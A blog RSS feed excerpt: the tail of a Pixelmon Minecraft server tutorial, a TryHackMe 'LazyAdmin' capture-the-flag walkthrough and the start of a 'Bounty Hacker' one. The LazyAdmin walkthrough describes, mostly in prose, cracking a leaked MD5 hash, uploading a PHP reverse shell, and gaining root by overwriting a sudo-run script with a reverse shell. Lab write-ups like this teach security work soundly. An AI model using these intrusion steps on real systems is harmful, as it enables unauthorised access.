<p class="wp-block-paragraph"><strong>Run server again </strong></p>



<p class="wp-block-paragraph">This time it will start creating files necessary to run the Minecraft server such as configuration and world files. Now you can install any mods from here or just use it as a Vanilla Minecraft server.</p>



<figure class="wp-block-image size-full is-resized"><img data-recalc-dims="1" loading="lazy" decoding="async" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2023/01/Screenshot_5-1.png?resize=840%2C632" alt="initializing pixelmon forge files" class="wp-image-973" width="840" height="632" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2023/01/Screenshot_5-1.png?w=1020&amp;ssl=1 1020w, https://i0.wp.com/eric.cc/wp-content/uploads/2023/01/Screenshot_5-1.png?resize=300%2C226&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2023/01/Screenshot_5-1.png?resize=768%2C578&amp;ssl=1 768w" sizes="(max-width: 840px) 100vw, 840px" /><figcaption class="wp-element-caption">Forge Minecraft server directory</figcaption></figure>



<p class="wp-block-paragraph">To install mods, we will need to stop the Minecraft server using the <code>Ctrl + C</code> shortcut.</p>



<p class="wp-block-paragraph"><strong>Pixelmon server jar download </strong></p>



<p class="wp-block-paragraph">Change your working directory into the mods directory.</p>



<p class="wp-block-paragraph"><code>cd mods</code></p>



<p class="wp-block-paragraph">Download Pixelmon server jar from the website.</p>



<p class="wp-block-paragraph"><code>wget https://download.nodecdn.net/containers/reforged/server/release/8.4.3/Pixelmon-1.12.2-8.4.3-server.jar</code></p>



<figure class="wp-block-image size-large"><img data-recalc-dims="1" loading="lazy" decoding="async" width="1024" height="251" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2023/01/Screenshot_6-1024x251.png?resize=1024%2C251" alt="installing pixelmon server.jar in mods directory" class="wp-image-960" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2023/01/Screenshot_6.png?resize=1024%2C251&amp;ssl=1 1024w, https://i0.wp.com/eric.cc/wp-content/uploads/2023/01/Screenshot_6.png?resize=300%2C73&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2023/01/Screenshot_6.png?resize=768%2C188&amp;ssl=1 768w, https://i0.wp.com/eric.cc/wp-content/uploads/2023/01/Screenshot_6.png?w=1026&amp;ssl=1 1026w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Installing PIxelmon server jar</figcaption></figure>



<p class="wp-block-paragraph"><strong>Delete the world folder</strong></p>



<p class="wp-block-paragraph">The world directory was generated before Pixelmon was loaded. Deleting it lets the mod generate a fresh world containing its Pokemon structures and other necessary items. This destroys the existing world, so back it up first if you want to keep it.</p>



<p class="wp-block-paragraph"><code>rm -rf world/</code></p>



<p class="wp-block-paragraph"><strong>Run server again</strong></p>



<p class="wp-block-paragraph"><code>java -jar forge-1.12.2-14.23.5.2860.jar --nogui</code></p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="1024" height="766" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2023/01/Screenshot_7.png?resize=1024%2C766" alt="Running forge server jar again" class="wp-image-961" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2023/01/Screenshot_7.png?w=1024&amp;ssl=1 1024w, https://i0.wp.com/eric.cc/wp-content/uploads/2023/01/Screenshot_7.png?resize=300%2C224&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2023/01/Screenshot_7.png?resize=768%2C575&amp;ssl=1 768w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Initializing PIxelmon server</figcaption></figure>



<h2 class="wp-block-heading">Post Installation</h2>



<p class="wp-block-paragraph"><strong>Join the server from the game client</strong></p>



<p class="wp-block-paragraph">Lastly, join the Minecraft Pixelmon server and enjoy your Pokemon adventure with friends on Minecraft! If the server is reachable from the internet, open only TCP 25565 in the firewall and keep the server process running under a dedicated unprivileged account rather than root.</p>



<figure class="wp-block-gallery has-nested-images columns-2 is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex">
<figure class="wp-block-image size-large"><img data-recalc-dims="1" loading="lazy" decoding="async" width="854" height="509" data-id="978" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2023/01/Screenshot_10-2.png?resize=854%2C509" alt="minecraft server list" class="wp-image-978" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2023/01/Screenshot_10-2.png?w=854&amp;ssl=1 854w, https://i0.wp.com/eric.cc/wp-content/uploads/2023/01/Screenshot_10-2.png?resize=300%2C179&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2023/01/Screenshot_10-2.png?resize=768%2C458&amp;ssl=1 768w" sizes="(max-width: 854px) 100vw, 854px" /><figcaption class="wp-element-caption">Minecraft server list</figcaption></figure>



<figure class="wp-block-image size-large"><img data-recalc-dims="1" loading="lazy" decoding="async" width="854" height="508" data-id="977" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2023/01/Screenshot_8-1.png?resize=854%2C508" alt="picking our starting pokemon pixelmon" class="wp-image-977" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2023/01/Screenshot_8-1.png?w=854&amp;ssl=1 854w, https://i0.wp.com/eric.cc/wp-content/uploads/2023/01/Screenshot_8-1.png?resize=300%2C178&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2023/01/Screenshot_8-1.png?resize=768%2C457&amp;ssl=1 768w" sizes="(max-width: 854px) 100vw, 854px" /><figcaption class="wp-element-caption">Starter Pixelmon Pokemon</figcaption></figure>



<figure class="wp-block-image size-large"><img data-recalc-dims="1" loading="lazy" decoding="async" width="854" height="505" data-id="975" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2023/01/Screenshot_9-2.png?resize=854%2C505" alt="Minecraft Pokemon" class="wp-image-975" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2023/01/Screenshot_9-2.png?w=854&amp;ssl=1 854w, https://i0.wp.com/eric.cc/wp-content/uploads/2023/01/Screenshot_9-2.png?resize=300%2C177&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2023/01/Screenshot_9-2.png?resize=768%2C454&amp;ssl=1 768w" sizes="(max-width: 854px) 100vw, 854px" /><figcaption class="wp-element-caption">Pixelmon Pokemon</figcaption></figure>



<figure class="wp-block-image size-large"><img data-recalc-dims="1" loading="lazy" decoding="async" width="854" height="510" data-id="976" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2023/01/Screenshot_11-1.png?resize=854%2C510" alt="Minecraft Pokemon Battle" class="wp-image-976" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2023/01/Screenshot_11-1.png?w=854&amp;ssl=1 854w, https://i0.wp.com/eric.cc/wp-content/uploads/2023/01/Screenshot_11-1.png?resize=300%2C179&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2023/01/Screenshot_11-1.png?resize=768%2C459&amp;ssl=1 768w" sizes="(max-width: 854px) 100vw, 854px" /><figcaption class="wp-element-caption">Pixelmon Pokemon Battle</figcaption></figure>
</figure>
<p>The post <a href="https://eric.cc/install-pixelmon-server/">Install Pixelmon Minecraft mod on Linux Server</a> appeared first on <a href="https://eric.cc">Eric Logan</a> written by <a href="https://eric.cc/author/eric/">eric</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://eric.cc/install-pixelmon-server/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">941</post-id>	</item>
		<item>
		<title>TryHackMe: LazyAdmin</title>
		<link>https://eric.cc/tryhackme-lazyadmin/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=tryhackme-lazyadmin</link>
					<comments>https://eric.cc/tryhackme-lazyadmin/#respond</comments>
		
		<dc:creator><![CDATA[eric]]></dc:creator>
		<pubDate>Thu, 01 Dec 2022 15:00:00 +0000</pubDate>
				<category><![CDATA[Write Ups]]></category>
		<category><![CDATA[TryHackMe]]></category>
		<guid isPermaLink="false">https://eric.cc/?p=436</guid>

					<description><![CDATA[<p><a href="https://eric.cc/tryhackme-lazyadmin/">TryHackMe: LazyAdmin</a><br />
<a href="https://eric.cc">Eric Logan</a></p>
<p>TryHackMe LazyAdmin is a classic story of sysadmins being lazy. Use public exploits and misconfigured settings to your advantage!</p>
<p>The post <a href="https://eric.cc/tryhackme-lazyadmin/">TryHackMe: LazyAdmin</a> appeared first on <a href="https://eric.cc">Eric Logan</a> written by <a href="https://eric.cc/author/eric/">eric</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><a href="https://eric.cc/tryhackme-lazyadmin/">TryHackMe: LazyAdmin</a><br />
<a href="https://eric.cc">Eric Logan</a></p>

<h2 class="wp-block-heading" id="introduction">Introduction</h2>



<p class="wp-block-paragraph"><a href="http://tryhackme.com/room/lazyadmin">TryHackMe: LazyAdmin</a> outlines a story as old as time. Outdated software, an exposed MySQL database backup, and an easy-to-crack password spell disaster for our lazy Linux administrator. Learn below what can go wrong when these elements are combined.</p>



<h2 class="wp-block-heading" id="information-gathering">Information Gathering</h2>



<figure class="wp-block-image size-large"><img data-recalc-dims="1" loading="lazy" decoding="async" width="1024" height="335" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2021/12/1.-Task-1-1024x335.png?resize=1024%2C335" alt="LazyAdmin Task 1" class="wp-image-731" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2021/12/1.-Task-1.png?resize=1024%2C335&amp;ssl=1 1024w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/12/1.-Task-1.png?resize=300%2C98&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/12/1.-Task-1.png?resize=768%2C251&amp;ssl=1 768w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/12/1.-Task-1.png?w=1209&amp;ssl=1 1209w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Task 1</figcaption></figure>



<p class="wp-block-paragraph">To get started, scan for open ports and the services running on them. It looks like SSH and a web server are running on this machine. We can use a tool like <a href="https://github.com/OJ/gobuster">gobuster</a> to brute-force directory names and see whether any directories are exposed.</p>



<figure class="wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-2 is-layout-flex wp-block-gallery-is-layout-flex">
<figure class="wp-block-image size-large is-style-default"><img data-recalc-dims="1" loading="lazy" decoding="async" width="1024" height="222" data-id="883" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2022/11/info-1024x222.png?resize=1024%2C222" alt="LazyAdmin Nmap and GoBuster results" class="wp-image-883" title="" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/info.png?resize=1024%2C222&amp;ssl=1 1024w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/info.png?resize=300%2C65&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/info.png?resize=768%2C166&amp;ssl=1 768w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/info.png?w=1506&amp;ssl=1 1506w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
<figcaption class="blocks-gallery-caption wp-element-caption">Nmap and GoBuster results</figcaption></figure>



<p class="wp-block-paragraph">Going to <code>http://10.10.222.75/content</code>, we are met with a SweetRice installation. <a href="https://www.sweetrice.xyz/">SweetRice</a> is an open-source website management system for creating common blogs or websites.</p>



<figure class="wp-block-image size-full is-resized"><img data-recalc-dims="1" loading="lazy" decoding="async" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2021/12/4.-SweetRice.png?resize=642%2C172" alt="website" class="wp-image-734" style="width:642px;height:172px" width="642" height="172" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2021/12/4.-SweetRice.png?w=685&amp;ssl=1 685w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/12/4.-SweetRice.png?resize=300%2C80&amp;ssl=1 300w" sizes="(max-width: 642px) 100vw, 642px" /><figcaption class="wp-element-caption">website</figcaption></figure>



<p class="wp-block-paragraph">I could not find what version of SweetRice this website was running by inspecting the website&#8217;s source code.</p>



<h2 class="wp-block-heading" id="exploitation">Exploitation</h2>



<p class="wp-block-paragraph">Sometimes it is best to take a shot in the dark when trying to exploit a machine. SweetRice version 1.5.1 has a vulnerability that exposes its MySQL <a href="https://www.exploit-db.com/exploits/40718">backup file</a> for anyone to download.</p>



<figure class="wp-block-image size-full is-resized"><img data-recalc-dims="1" loading="lazy" decoding="async" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2021/12/7.-mysql_backup.png?resize=676%2C216" alt="mysql backup file" class="wp-image-737" style="width:676px;height:216px" width="676" height="216" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2021/12/7.-mysql_backup.png?w=676&amp;ssl=1 676w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/12/7.-mysql_backup.png?resize=300%2C96&amp;ssl=1 300w" sizes="(max-width: 676px) 100vw, 676px" /><figcaption class="wp-element-caption">exposed MySQL backup</figcaption></figure>



<p class="wp-block-paragraph">Going to the URL, we can find a MySQL backup file from October 29, 2019. </p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="778" height="467" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2022/11/8.-mysql-highlighted.png?resize=778%2C467" alt="sweetrice mysql leak" class="wp-image-905" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/8.-mysql-highlighted.png?w=778&amp;ssl=1 778w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/8.-mysql-highlighted.png?resize=300%2C180&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/8.-mysql-highlighted.png?resize=768%2C461&amp;ssl=1 768w" sizes="(max-width: 778px) 100vw, 778px" /><figcaption class="wp-element-caption">exposed user database</figcaption></figure>



<p class="wp-block-paragraph">Going through the MySQL file, we can see the users of the website. There is a user <code>manager</code> whose password is stored as a conveniently crackable MD5 hash. We can run this hash through hashcat, crack the password, and use it to log into SweetRice&#8217;s admin portal.</p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="773" height="123" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2021/12/9.-sql-pass.png?resize=773%2C123" alt="password cracked" class="wp-image-739" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2021/12/9.-sql-pass.png?w=773&amp;ssl=1 773w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/12/9.-sql-pass.png?resize=300%2C48&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/12/9.-sql-pass.png?resize=768%2C122&amp;ssl=1 768w" sizes="(max-width: 773px) 100vw, 773px" /><figcaption class="wp-element-caption">cracked admin password</figcaption></figure>



<p class="wp-block-paragraph">Easy peasy, the administrator chose a weak password!</p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="738" height="158" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2021/12/10-a.-as-directory.png?resize=738%2C158" alt="sweetrice" class="wp-image-740" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2021/12/10-a.-as-directory.png?w=738&amp;ssl=1 738w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/12/10-a.-as-directory.png?resize=300%2C64&amp;ssl=1 300w" sizes="(max-width: 738px) 100vw, 738px" /><figcaption class="wp-element-caption">admin dashboard url</figcaption></figure>



<p class="wp-block-paragraph">There are several ways to find the SweetRice admin portal. I found it on exploit-db when looking at SweetRice&#8217;s <a href="https://www.exploit-db.com/exploits/40716">arbitrary file upload exploit</a>. Alternatively, it could be found by recursively brute-forcing all the directories with dirbuster or looking through SweetRice&#8217;s documentation. All in all, the admin login page is located at <code>/as/</code>.</p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="423" height="579" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2021/12/10.-login-panel.png?resize=423%2C579" alt="LazyAdmin Sweetrice login" class="wp-image-741" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2021/12/10.-login-panel.png?w=423&amp;ssl=1 423w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/12/10.-login-panel.png?resize=219%2C300&amp;ssl=1 219w" sizes="(max-width: 423px) 100vw, 423px" /><figcaption class="wp-element-caption">admin dashboard login</figcaption></figure>



<p class="wp-block-paragraph">Using the username and password we just cracked, we can log into the SweetRice admin portal. Admins can post, change settings, and upload files.</p>



<figure class="wp-block-image size-large"><img data-recalc-dims="1" loading="lazy" decoding="async" width="1024" height="618" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2021/12/11.-SweetRice-manager-1024x618.png?resize=1024%2C618" alt="SweetRice dashboard" class="wp-image-742" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2021/12/11.-SweetRice-manager.png?resize=1024%2C618&amp;ssl=1 1024w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/12/11.-SweetRice-manager.png?resize=300%2C181&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/12/11.-SweetRice-manager.png?resize=768%2C463&amp;ssl=1 768w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/12/11.-SweetRice-manager.png?w=1363&amp;ssl=1 1363w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">SweetRice admin dashboard</figcaption></figure>



<p class="wp-block-paragraph">We are interested in uploading files. Instead of using the arbitrary file upload exploit, I decided to use the reverse PHP shell from <a href="https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php">pentestmonkey</a>. They&#8217;ll both get a shell on the web server. </p>



<figure class="wp-block-image size-large"><img data-recalc-dims="1" loading="lazy" decoding="async" width="1024" height="345" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2021/12/13.-file-upload-1024x345.png?resize=1024%2C345" alt="File upload" class="wp-image-744" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2021/12/13.-file-upload.png?resize=1024%2C345&amp;ssl=1 1024w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/12/13.-file-upload.png?resize=300%2C101&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/12/13.-file-upload.png?resize=768%2C259&amp;ssl=1 768w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/12/13.-file-upload.png?resize=1536%2C518&amp;ssl=1 1536w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/12/13.-file-upload.png?w=1890&amp;ssl=1 1890w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">SweetRice media center</figcaption></figure>



<h2 class="wp-block-heading" id="post-exploitation">Post Exploitation</h2>



<p class="wp-block-paragraph">After connecting to the web server, head to the home directory, where there is a user named itguy, and read the user.txt flag.</p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="771" height="229" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2022/11/14.-user-highlighted.png?resize=771%2C229" alt="LazyAdmin user.txt" class="wp-image-906" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/14.-user-highlighted.png?w=771&amp;ssl=1 771w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/14.-user-highlighted.png?resize=300%2C89&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/14.-user-highlighted.png?resize=768%2C228&amp;ssl=1 768w" sizes="(max-width: 771px) 100vw, 771px" /><figcaption class="wp-element-caption">SweetRice user.txt</figcaption></figure>



<p class="wp-block-paragraph">Finally, to escalate our privileges to the root user, run the command <code>sudo -l</code>. It lists which commands the current user may run as the superuser without entering a password.</p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="774" height="136" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2021/12/15.-sudo-l.png?resize=774%2C136" alt="sudo -l" class="wp-image-749" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2021/12/15.-sudo-l.png?w=774&amp;ssl=1 774w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/12/15.-sudo-l.png?resize=300%2C53&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/12/15.-sudo-l.png?resize=768%2C135&amp;ssl=1 768w" sizes="(max-width: 774px) 100vw, 774px" /><figcaption class="wp-element-caption">sudo -l output</figcaption></figure>



<p class="wp-block-paragraph">It looks like we can run Perl as root on itguy&#8217;s backup.pl file.</p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="808" height="157" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2021/12/16.-gtfobin.png?resize=808%2C157" alt="gtfobins result" class="wp-image-750" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2021/12/16.-gtfobin.png?w=808&amp;ssl=1 808w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/12/16.-gtfobin.png?resize=300%2C58&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/12/16.-gtfobin.png?resize=768%2C149&amp;ssl=1 768w" sizes="(max-width: 808px) 100vw, 808px" /><figcaption class="wp-element-caption">Perl command</figcaption></figure>



<p class="wp-block-paragraph">This is pretty straightforward. According to <a href="https://gtfobins.github.io/gtfobins/perl/#sudo">gtfobins</a>, all we need to do is run the Perl command through sudo with the backup.pl file and it will run as root. Unfortunately, we only have read and execute permissions on the backup.pl file, so let&#8217;s read it and see what backup.pl actually does.</p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="238" height="82" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2021/12/17.-perl-priv.png?resize=238%2C82" alt="LazyAdmin perl script" class="wp-image-751"/><figcaption class="wp-element-caption">backup.pl</figcaption></figure>



<p class="wp-block-paragraph">It looks like <code>backup.pl</code> runs the <code>copy.sh</code> script. Looking in the /etc/ directory, we have read, write, and execute permissions on the <code>copy.sh</code> file. The plan is to overwrite that file with a reverse shell, run <code>backup.pl</code> as root, and have the server connect back to our machine as root.</p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="770" height="82" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2022/11/18.-copy-highlighted.png?resize=770%2C82" alt="LazyAdmin copy.sh" class="wp-image-908" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/18.-copy-highlighted.png?w=770&amp;ssl=1 770w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/18.-copy-highlighted.png?resize=300%2C32&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/18.-copy-highlighted.png?resize=768%2C82&amp;ssl=1 768w" sizes="(max-width: 770px) 100vw, 770px" /><figcaption class="wp-element-caption">copy.sh</figcaption></figure>



<p class="wp-block-paragraph"><a href="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#netcat-openbsd">PayloadsAllTheThings</a> is an open-source resource with hundreds of ways to create a reverse shell. I first tried the traditional netcat commands. However, after running them, it said that the version of netcat the server was using was the netcat-openbsd package.</p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="490" height="46" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2021/12/22.-sudo-perl.png?resize=490%2C46" alt="" class="wp-image-752" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2021/12/22.-sudo-perl.png?w=490&amp;ssl=1 490w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/12/22.-sudo-perl.png?resize=300%2C28&amp;ssl=1 300w" sizes="(max-width: 490px) 100vw, 490px" /><figcaption class="wp-element-caption">running backup.pl</figcaption></figure>



<p class="wp-block-paragraph">Running the command exactly as it is written in the <code>sudo -l</code> output is the only way to avoid being prompted for a password.</p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="490" height="195" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2022/11/24.-root-highlighted.png?resize=490%2C195" alt="LazyAdmin root.txt" class="wp-image-909" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/24.-root-highlighted.png?w=490&amp;ssl=1 490w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/24.-root-highlighted.png?resize=300%2C119&amp;ssl=1 300w" sizes="(max-width: 490px) 100vw, 490px" /><figcaption class="wp-element-caption">SweetRice root.txt</figcaption></figure>



<p class="wp-block-paragraph">Lastly, launching another shell on my attacker machine and running the Perl command, I became root. It&#8217;s now as easy as going to the root directory and reading the root.txt flag.</p>



<h2 class="wp-block-heading" id="conclusion">Conclusion</h2>



<p class="wp-block-paragraph">This is a scenario that could most certainly happen in the real world. It doesn&#8217;t necessarily come down to laziness; projects come and go. IT staff need to be aware when this happens and take the necessary steps to avoid running vulnerable software on their systems.</p>



<figure class="wp-block-image size-large"><img data-recalc-dims="1" loading="lazy" decoding="async" width="1024" height="311" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2021/12/25.-Task-1-Solutions-1024x311.png?resize=1024%2C311" alt="LazyAdmin Task 1 Solutions" class="wp-image-747" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2021/12/25.-Task-1-Solutions.png?resize=1024%2C311&amp;ssl=1 1024w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/12/25.-Task-1-Solutions.png?resize=300%2C91&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/12/25.-Task-1-Solutions.png?resize=768%2C233&amp;ssl=1 768w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/12/25.-Task-1-Solutions.png?w=1212&amp;ssl=1 1212w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Task 1 Solution</figcaption></figure>
<p>The post <a href="https://eric.cc/tryhackme-lazyadmin/">TryHackMe: LazyAdmin</a> appeared first on <a href="https://eric.cc">Eric Logan</a> written by <a href="https://eric.cc/author/eric/">eric</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://eric.cc/tryhackme-lazyadmin/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">436</post-id>	</item>
		<item>
		<title>TryHackMe: Bounty Hacker</title>
		<link>https://eric.cc/tryhackme-bounty-hacker/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=tryhackme-bounty-hacker</link>
					<comments>https://eric.cc/tryhackme-bounty-hacker/#respond</comments>
		
		<dc:creator><![CDATA[eric]]></dc:creator>
		<pubDate>Wed, 28 Sep 2022 14:00:00 +0000</pubDate>
				<category><![CDATA[Write Ups]]></category>
		<category><![CDATA[TryHackMe]]></category>
		<guid isPermaLink="false">https://eric.cc/?p=493</guid>

					<description><![CDATA[<p><a href="https://eric.cc/tryhackme-bounty-hacker/">TryHackMe: Bounty Hacker</a><br />
<a href="https://eric.cc">Eric Logan</a></p>
<p>TryHackMe Bounty Hacker is an easily guided challenge. It involves enumeration, cracking passwords, and Linux privilege escalation!</p>
<p>The post <a href="https://eric.cc/tryhackme-bounty-hacker/">TryHackMe: Bounty Hacker</a> appeared first on <a href="https://eric.cc">Eric Logan</a> written by <a href="https://eric.cc/author/eric/">eric</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><a href="https://eric.cc/tryhackme-bounty-hacker/">TryHackMe: Bounty Hacker</a><br />
<a href="https://eric.cc">Eric Logan</a></p>

<h2 class="wp-block-heading">Introduction</h2>



<p class="wp-block-paragraph">It looks like our bragging brought the attention of Spike Spiegel and his crew in TryHackMe: Bounty Hacker. They need us to <a href="https://tryhackme.com/room/cowboyhacker">hack and gain root on this system</a>, no questions asked. With some enumeration and an anonymous FTP account, we can crack the SSH password to become a user on the system and exploit tar to escalate our privileges to root.</p>



<h2 class="wp-block-heading">Information Gathering</h2>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="681" src="//i0.wp.com/eric.cc/wp-content/uploads/2022/06/Task-1-1024x681.png" alt="Bounty Hacker Task 1 " class="wp-image-838" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/06/Task-1.png?resize=1024%2C681&amp;ssl=1 1024w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/06/Task-1.png?resize=300%2C200&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/06/Task-1.png?resize=768%2C511&amp;ssl=1 768w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/06/Task-1.png?w=1209&amp;ssl=1 1209w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Task 1</figcaption></figure>



<p class="wp-block-paragraph">Like any other challenge, I want to get the lay of the land.  We are looking for any open ports and what kind of services they are running. </p>



